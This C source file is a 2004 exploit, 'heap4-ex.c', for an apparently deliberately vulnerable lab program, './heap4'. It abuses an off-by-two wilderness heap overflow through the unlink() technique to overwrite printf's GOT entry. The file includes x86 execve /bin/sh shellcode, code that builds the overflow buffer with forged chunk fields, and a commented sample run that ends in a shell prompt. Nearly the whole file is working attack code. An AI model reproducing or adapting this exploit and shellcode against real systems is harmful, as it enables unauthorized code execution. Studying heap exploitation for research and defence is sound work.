/*
 * $Id: heap4-ex.c,v 1.1.1.1 2004/05/29 14:15:05 raptor Exp $
 *
 * heap4-ex.c - heap4.c exploit (wilderness off-by-two)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the heap-to-stack unlink() technique to exploit an
 * off-by-two wilderness heap overflow. See the paper "Exploiting the 
 * wilderness" by Phantasmal Phantasmagoria for an in-depth description of 
 * this technique (http://seclists.org/lists/vuln-dev/2004/Feb/0025.html).
 *
 * For some reason, the off-by-one overflow as described by Phantasmal
 * Phantasmagoria doesn't appear to suffice to forge a size field able
 * to trigger the call to the unlink() macro, at least on the systems
 * i've tried. 
 *
 * Buffer structure:
 * [printf_addr - 12] [ret] ["A"s] [prev_size] | [0x02] [0x02] <- off-by-two
 *
 * raptor@karma:~/devel/heap$ uname -a
 * Linux karma 2.4.18-1-686-smp #1 SMP Mon Jan 5 20:42:23 UTC 2004 i686 unknown
 * raptor@karma:~/devel/heap$ gcc --version
 * 2.95.4
 * raptor@karma:~/devel/heap$ ./heap4-ex  
 * Using ret address       : 0xbfffffcf
 * Using printf() address  : 0x804967c
 * Using vuln buf address  : 0x80496a8
 * Using argv[1] address   : 0xbffffbd0
 * Using special prev_size : 1208262360
 *
 * sh-2.05a$ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap4"	// the vulnerable program
#define BUFSIZE		1022 + 1	// max size of the evil buf
#define PRINTF		0x0804967c	// printf() address in .got
#define	MALLOC		0x080496a8	// address of the vuln buf
#define	ARGV1		0xbffffbd0	// address of the argv[1]

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE];
	char	*p = buf;

	char	*env[2] = {sc, NULL};
	int	printf_addr = PRINTF;

	/* calculate the ret address in envp */
	int 	ret = 0xbffffffa - strlen(sc) - strlen(VULN);

	/*
	 * set up the special prev_size field: we actually wanna end up
	 * pointing to the stack, exactly 8 bytes before argv[1] to ensure 
	 * the fd and bk are hit right, so we add 8 before complementing.
	 */
	int	prev_size = -(ARGV1 - (MALLOC + (1020 - 4))) + 8;

	/* prepare the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* fd field of the fake chunk in stack */
	*((void **)p) = (void *)(printf_addr - 12);
	p += 4;

	/* bk field of the fake chunk in stack */
	*((void **)p) = (void *)(ret);
	p += 4;

	/* padding */
	p += (1020 - 4) - 8;

	/* prev_size field of the wilderness */
	*((void **)p) = (void *)(prev_size);
	p += 4;

	/* two-bytes overflow */
	*p++ = 0x02;
	*p++ = 0x02;

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using printf() address\t: %p\n", printf_addr);
	fprintf(stderr, "Using vuln buf address\t: %p\n", MALLOC);
	fprintf(stderr, "Using argv[1] address\t: %p\n", ARGV1);
	fprintf(stderr, "Using special prev_size\t: %d\n\n", prev_size);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf, NULL, env);
	perror("execle");
}
